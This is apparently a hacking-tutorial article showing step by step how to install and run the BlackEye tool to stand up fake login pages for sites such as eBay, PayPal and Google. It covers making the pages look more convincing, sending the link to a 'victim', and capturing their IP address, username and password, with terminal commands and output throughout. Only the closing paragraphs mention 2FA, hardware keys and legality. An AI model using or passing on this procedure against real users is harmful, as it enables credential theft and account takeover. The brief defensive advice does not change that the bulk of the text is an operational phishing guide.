Social media accounts are a favorite target for hackers, and the most effective tactics for attacking accounts on websites like Facebook, Instagram, and Twitter are often based on phishing. These password-stealing attacks rely on tricking users into entering their passwords into a convincing fake webpage, and they have become increasingly easy to make thanks to tools like BlackEye.
BlackEye is a tool to rapidly generate phishing pages that target social media websites, making it much easier to phish targets of opportunity on the same network. After redirecting a target to the phishing page, it's easy to capture passwords to social media accounts harvested from unwitting targets.
Users place a lot of trust in their social media accounts. If the target doesn't have 2FA enabled, the ease with which an attacker can access them may be surprising. A single mistake typing a password into the wrong website can be all it takes to lose access to your account. BlackEye is a proof of concept that shows how these phishing pages don't need to be sophisticated or customized to work effectively.
- Don't Miss: Track a Target Using Canary Token Tracking Links
BlackEye is a straightforward bash script that presents several templates to pick from, allowing you to select which social media website to emulate. From there, it creates a functional phishing site on your device, with the ability to be port forwarded or connected in other ways to your target's machine.
BlackEye supports 32 different websites with phishing templates, but these range in quality. It's best to test them out before deploying them because some suffer from flaws that could give them away if a user is paying attention. While the default phishing pages provided with BlackEye are pretty good, it's always useful to be able to modify them. That way, you can remove things like a copyright notice from the wrong year.
Among the more interesting websites that BlackEye supports are Protonmail, Github, Gitlab, Adobe, Verizon, Twitter, Facebook, Shopify, PayPal, and Google. You can test these quickly by following the steps below and clicking on the phishing URL to find out how realistic each template looks before using it.
BlackEye is an extremely straightforward tool but works best on Kali Linux. That's because of the number of dependencies it relies on to run, but these can be installed as needed on Ubuntu or Debian devices. Once you have a Kali distro fully updated, you should be ready to install BlackEye.
~$ git clone https://github.com/thelinuxchoice/blackeye Cloning into 'blackeye'... remote: Enumerating objects: 361, done. remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361 Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done. Resolving deltas: 100% (101/101), done. ~$ cd blackeye ~/blackeye$
That should install the BlackEye repository and enable it to run it from the blackeye folder with the bash blackeye.sh command. When we run the command, we should see the splash screen below.
~/blackeye$ bash blackeye.sh :: Disclaimer: Developers assume no liability and are not :: :: responsible for any misuse or damage caused by BlackEye. :: :: Only use for educational purporses!! :: :: Attacking targets without mutual consent is illegal! ::  Instagram  IGFollowers  Custom BLACKEYE v1.1  Facebook  eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒  Snapchat  Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒  Twitter  CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒  Github  Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒  Google  DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒  Spotify  Adobe ID ▐┼▐▒▒██████████████▒▒▒  Netflix  Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒  PayPal  Messenger ▒▒█████──────────▐███▌  Origin  GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒  Steam  Twitch ▒▒█▒▒███████▄██████▒▒▒  Yahoo  MySpace ▒▒▒▒▒██████████████▒▒▒  Linkedin  Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒  Protonmail  VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒  Wordpress  Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒  Microsoft  devianART CODED BY: @thelinuxchoice UPGRADED BY: @suljot_gjoka
If we don't like something like an expired copyright notice, we can change it pretty easily. First, exit out of the bash script back into the blackeye folder. Then, we'll type ls to see the sites folder within the BlackEye repo.
~/blackeye$ ls blackeye.sh LICENSE README.md sites
We can navigate to it using the cd sites command. Then, type ls to see all of the phishing site templates available to modify.
~/blackeye$ cd sites ~/blackeye/sites$ ls adobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpress badoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoo create dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandex
To edit Protonmail, we can type cd protonmail and then ls again to see the files in that folder. You should see something like the files below.
~/blackeye/sites$ cd protonmail ~/blackeye/sites/protonmail$ ls index_files index.php ip.php ip.txt login.html login.php saved.ip.txt saved.usernames.txt
To edit the HTML of the phishing page, you can do so directly by opening login.html with a text editor, allowing you to easily update any copyright notices or other details.
To start our phishing page, open a terminal window and navigate to the blackeye folder again. Then, run the bash blackeye.sh command to get back to the phishing page selection menu. Here, we'll select eBay, which is number 18.
~/blackeye/sites/protonmail$ cd ~$ cd blackeye ~/blackeye$ bash blackeye.sh  Instagram  IGFollowers  Custom BLACKEYE v1.1  Facebook  eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒  Snapchat  Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒  Twitter  CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒  Github  Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒  Google  DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒  Spotify  Adobe ID ▐┼▐▒▒██████████████▒▒▒  Netflix  Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒  PayPal  Messenger ▒▒█████──────────▐███▌  Origin  GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒  Steam  Twitch ▒▒█▒▒███████▄██████▒▒▒  Yahoo  MySpace ▒▒▒▒▒██████████████▒▒▒  Linkedin  Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒  Protonmail  VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒  Wordpress  Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒  Microsoft  devianART CODED BY: @thelinuxchoice UPGRADED BY: @suljot_gjoka [*] Choose an option: 18
After entering the number of the site you wish to create, press enter. Next, we'll be asked to supply our IP address. If you press enter without adding one, it will try to add yours by default, but it doesn't always work. After supplying your IP address, you should see something like the prompt below.
[*] Put your local IP (Default 10.0.6.27): [*] Starting php server... [*] Send this link to the Victim: 192.168.0.16 [*] Waiting victim open the link ...
Next, navigate to the phishing link in a browser to see the result of your phishing site.
When you open the site in a browser, it should look something like this:
Opening the link causes the script to report back on the type of devices currently accessing the phishing page.
[*] Waiting victim open the link ... [*] IP Found! [*] Victim IP: 192.168.43.142 [*] User-Agent: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 [*] Saved: shopping/saved.ip.txt
Once the target enters their credentials, they're redirected to the real eBay page, creating the illusion of a successful login.
On the hacker's side, BlackEye provides us with the credentials our target just entered.
[*] Waiting credentials ... [*] Credentials Found! [*] Account: fudruckers [*] Password: thefudruckerking69 [*] Saved: sites/shopping/saved.usernames.txt
Just like that, we've intercepted and saved the credentials a target entered into our phishing page!
When it comes to stopping attacks like this, two-factor authentication is the average user's best friend. Without it, a single mistake can lead to your password being stolen and used to access your account by an attacker. So set up 2FA on Facebook, Instagram, and whatever other accounts you have.
Another step towards improving security is to use a hardware security key to require new devices to use your key to log in, rendering stolen passwords and even intercepted text messages useless. Keep in mind that while BlackEye makes phishing easy, it doesn't make it legal to steal passwords for accounts that you don't have permission to access.
I hope you enjoyed this guide to phishing social media passwords! If you have any questions about this tutorial on social media phishing tools please ask below, and if you have a comment or idea for a future episode, feel free to reach me on Twitter @KodyKinzie.
Start your White-Hat Hacker journey with our Beginner's Course on Linux and Shell Scripting Fundamentals (including BASH, Pearl, and Python).